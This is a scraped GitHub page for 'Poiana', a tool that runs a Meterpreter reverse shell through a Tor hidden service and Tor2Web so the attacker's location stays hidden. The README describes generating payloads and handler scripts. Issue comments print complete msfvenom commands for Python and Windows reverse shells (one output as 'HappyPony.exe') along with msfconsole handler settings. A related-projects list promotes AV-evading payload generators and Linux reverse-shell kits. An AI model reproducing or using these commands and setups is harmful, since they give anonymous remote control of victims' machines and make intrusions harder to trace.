Meterpreter Reverse shell over TOR network using hidden services

Related tags

Security related resources tor reverseshell meterpreter hiddenservice
Overview

Poiana

Reverse shell over TOR network using hidden services

Features

-> Create a hidden service

-> Generate non-staged payload (python/meterpreter_reverse_http)

-> Convert url using Tor2Web: a final extension .ws will be added, so url becomes available outside tor network

-> Generate batch .rc file for msfconsole

Usage

$ git clone https://github.com/CalfCrusher/Poiana/

$ cd Poiana && pip3 install -r requirements.txt

$ python3 poiana.py

NOTE: You need to edit your torrc file and insert: ControlPort 9151

I didn't want to insert this automatic 'feature' in my tool because of course you need to be root to edit torrc. In this way this script can run just as normal user. Remember do NOT run/trust scripts from others, discover some backdoor in fancy scripts is not rare unfortunately! Take care of source code, always :)

Be careful if the script fails to deleting hidden_service_data for some reasons. Script won't start correctly if this dir is already present before running tool. I'm trying to fix this behaviour, also because i want to add the (optional) feature to have persistence onion url and maybe the option to make an ephemeral hidden service (a hidden service without touching disk)

Why this project?

Reverse Shell on hidden services through Tor are sexy

One of the weaknesses of the attackers when they're exfiltrating compromised information is that they expose part of their technological infrastructure during the process. In this sense, the Tor network offers the possibility of making services in a machine accessible as hidden services, by taking advantage of the anonymity it offers and thereby preventing the real location of the machine from being exposed. Using Tor2Web, victim doesn't need to have tor or ncat. So, using Tor2Web our victim can establish a connection to our hidden service. To me it's really an interesting way to pop a reverse shell quite anonymously.

Tor2Web

Tor2web https://www.tor2web.org - is a software project to allow Tor hidden services to be accessed from a standard browser without being connected to the Tor network. You can find a list of Tor2Web volunteers: https://www.reddit.com/r/onions/comments/bx19c6/list_of_tor2web_gateways/

Disclaimer

Onion network is NOT 100% bulletproof: https://www.wired.com/2014/12/fbi-metasploit-tor. I made this tool just for educational use only. I'm not responsible for the consequences of illegal use. Please understands also that there is no warranty for this free software. Please note also that using Tor2Web is NOT secure from victim's point of view: the point of Tor is that users can connect without being eavesdropped on, and going through the clearnet (Tor2Web), even with https, seriously cripples the efforts made to protect users!

Comments
  • AttributeError: 'NoneType' object has no attribute 'hostname'

    AttributeError: 'NoneType' object has no attribute 'hostname'

    please help with this one:

    • Starting tor network..
    • Creating hidden service in /home/kali/Poiana/hidden_service_data Traceback (most recent call last): File "/home/kali/Poiana/poiana.py", line 141, in main() File "/home/kali/Poiana/poiana.py", line 136, in main stem() File "/home/kali/Poiana/poiana.py", line 91, in stem if result.hostname: AttributeError: 'NoneType' object has no attribute 'hostname'
    opened by jwinns 4
  • [Errno 111] Connection refused

    [Errno 111] Connection refused

    I'm getting this issue when I try to run the script: ` * Starting tor network.. Traceback (most recent call last): File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/socket.py", line 535, in _make_socket control_socket.connect((self.address, self.port)) ConnectionRefusedError: [Errno 111] Connection refused

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last): File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/connection.py", line 1063, in _connection_for_default_port return stem.socket.ControlPort(address, 9151) File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/socket.py", line 503, in init self.connect() File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/socket.py", line 172, in connect self._socket = self._make_socket() File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/socket.py", line 538, in _make_socket raise stem.SocketError(exc) stem.SocketError: [Errno 111] Connection refused

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last): File "/home/kali/Poiana/poiana.py", line 143, in main() File "/home/kali/Poiana/poiana.py", line 138, in main stem() File "/home/kali/Poiana/poiana.py", line 76, in stem with Controller.from_port() as controller: File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/control.py", line 1031, in from_port control_port = stem.connection._connection_for_default_port(address) File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/connection.py", line 1065, in _connection_for_default_port raise exc File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/connection.py", line 1060, in _connection_for_default_port return stem.socket.ControlPort(address, 9051) File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/socket.py", line 503, in init self.connect() File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/socket.py", line 172, in connect self._socket = self._make_socket() File "/usr/local/lib/python3.10/dist-packages/stem-1.8.0-py3.10.egg/stem/socket.py", line 538, in _make_socket raise stem.SocketError(exc) stem.SocketError: [Errno 111] Connection refused `

    opened by tavgar 3
  • AttributeError: 'NoneType' object has no attribute 'hostname'

    AttributeError: 'NoneType' object has no attribute 'hostname'

    • Starting tor network..
    • Creating hidden service in /home/ubuntu/Poiana/hidden_service_data Traceback (most recent call last): File "poiana.py", line 141, in main() File "poiana.py", line 136, in main stem() File "poiana.py", line 91, in stem if result.hostname: AttributeError: 'NoneType' object has no attribute 'hostname'
    opened by Deathpoolxrs 0
  • Manual process

    Manual process

    Can you explain the manual process of your script? It seems that I am unable to connect back to the tor hidden service msfconsole, no matter what I try. Can you check the following config and verify you can connect with the same config?

    • Create a hidden service domain name with the following addition in torrc
    HiddenServiceDir /home/kali/tor_hidden_service/
HiddenServicePort 80 127.0.0.1:5000

    • Generate a python stageless http payload, and add ".re" at the end of LHOST (hidden service domain) msfvenom -f raw -p python/meterpreter_reverse_http LHOST=do5npekqive7vbeiq3g4enf4qnxmvslcybpslfe63ijodw5tbbvoqzqd.onion.re LPORT=80 > payload_not_clean.py

    • Start msfconsole with the following options

    use exploit/multi/handler
set payload python/meterpreter_reverse_http
set lport 5000
set lhost 127.0.0.1
set exitonsession false
set sessioncommunicationtimeout 0
set sessionexpirationtimeout 0
exploit -j -z

    After debugging of my payload with wireshark, I can see that there is a 301 redirect to HTTPS, resulting to a "bad request".

    Any suggestions?

    opened by analyserdmz 1
  • Just a quick question

    Just a quick question

    Hi,

    Awesome repo. What other payloads can be used with this.

    I tried it out in my lab, it works with the python payload however I tried changing the listener as well as the msvenom payload to a windows stageless payload and it doesn't seem to work.

    f.write("set PAYLOAD windows/meterpreter_reverse_tcp\n")

    payload = "msfvenom -p windows/shell_reverse_tcp LHOST=" + lhost + " LPORT=80 -f exe > HappyPony.exe"

    opened by ejawhary 1
Owner
calfcrusher
Security Researcher
calfcrusher
GitHub
Generate obfuscated meterpreter shells

Generator Evade AV with obfuscated payloads Installation must install dotnet prior to running the script with net45 Running ./generator.py -ip <Your-I

Fawaz Al-Mutairi 219 Nov 28, 2022
Generate MIPS reverse shell shellcodes easily !

MIPS-Reverse MIPS-Reverse is a tool that can generate shellcodes for the MIPS architecture that launches a reverse shell where you can specify the IP

null 29 Jul 27, 2021
An advanced multi-threaded, multi-client python reverse shell for hacking linux systems

PwnLnX An advanced multi-threaded, multi-client python reverse shell for hacking linux systems. There's still more work to do so feel free to help out

0xTRAW 212 Dec 24, 2022
Tor Relay availability checker, for using it as a bridge in countries with censorship

Tor Relay Availability Checker This small script downloads all Tor Relay IP addresses from onionoo.torproject.org and checks whether random Relays are

ValdikSS 161 Dec 30, 2022
The Devils Eye is an OSINT tool that searches the Darkweb for onion links and descriptions that match with the users query without requiring the use for Tor.

The Devil's Eye searches the darkweb for information relating to the user's query and returns the results including .onion links and their description

Richard Mwewa 135 Dec 31, 2022
Auto Tor Ip Changer

AutoTor Auto Tor Ip Changer for Linux! git clone https://github.com/Arest7/AutoTor cd AutoTor pip install -r requirements.txt python3 AutoTor.py follo

Ken Ryuguji 3 Jan 23, 2022
Instagram brute force tool that uses tor as its proxy connections

Insta-crack This is a instagram brute force tool that uses tor as its proxy connections, keep in mind that you should not do anything illegal with thi

Liam 3 Jan 28, 2022
This is a partial and quick and dirty proof of concept implementation of the following specifications to configure a tor client to use trusted exit relays only.

This is a partial and quick and dirty proof of concept implementation of the following specifications to configure a tor client to use trusted exit re

null 22 Nov 9, 2022
DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by launching a dictionary based attack against a webserver and analyse its response.

DirBruter DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by laun

vijay sahu 12 Dec 17, 2022
This tool help you to check if your Windows machine has hidden miner.

Hidden Miner Detector This tool help you to check if your Windows machine has hidden miner. Miners track when you open antivirus software or task mana

Николай Борщёв 2 Oct 5, 2022
Advanced subdomain scanner, any domain hidden subdomains

little advanced subdomain scanner made in python, works very quick and has options to change the port u want it to connect for

Nano 5 Nov 23, 2021
Python script to tamper with pages to test for Log4J Shell vulnerability.

log4jShell Scanner This shell script scans a vulnerable web application that is using a version of apache-log4j < 2.15.0. This application is a static

GoVanguard 8 Oct 20, 2022
Unauthenticated Sqlinjection that leads to dump data base but this one impersonated Admin and drops a interactive shell

Unauthenticated Sqlinjection that leads to dump database but this one impersonated Admin and drops a interactive shell

sam 16 Nov 9, 2022
This Repository is an up-to-date version of Harvard nlp's Legacy code and a Refactoring of the jupyter notebook version as a shell script version.

This Repository is an up-to-date version of Harvard nlp's Legacy code and a Refactoring of the jupyter notebook version as a shell script version.

신재욱 17 Sep 25, 2022
Reverse engineered Parler API

Parler's unofficial API with all endpoints present in their iOS app as of 08/12/2020. For the most part undocumented, but the error responses are alre

null 393 Nov 26, 2022
Flutter Reverse Engineering Framework

This framework helps reverse engineer Flutter apps using patched version of Flutter library which is already compiled and ready for app repacking. There are changes made to snapshot deserialization process that allow you perform dynamic analysis in a convenient way.

PT SWARM 910 Jan 1, 2023
Driver Buddy Reloaded is an IDA Pro Python plugin that helps automate some tedious Windows Kernel Drivers reverse engineering tasks.

Driver Buddy Reloaded Quickstart Table of Contents Installation Usage About Driver Buddy Reloaded Finding DispatchDeviceControl Labelling WDM & WDF St

Paolo 'VoidSec' Stagno 199 Jan 4, 2023
A Burp Suite extension made to automate the process of finding reverse proxy path based SSRF.

TProxer A Burp Suite extension made to automate the process of finding reverse proxy path based SSRF. How • Install • Todo • Join Discord How it works

Krypt0mux 162 Nov 25, 2022
IDA scripts for hypervisor (Hyper-v) analysis and reverse engineering automation

Re-Scripts IA32-VMX-Helper (IDA-Script) IA32-MSR-Decoder (IDA-Script) IA32 VMX Helper It's an IDA script (Updated IA32 MSR Decoder) which helps you to

Behrooz Abbassi 16 Oct 8, 2022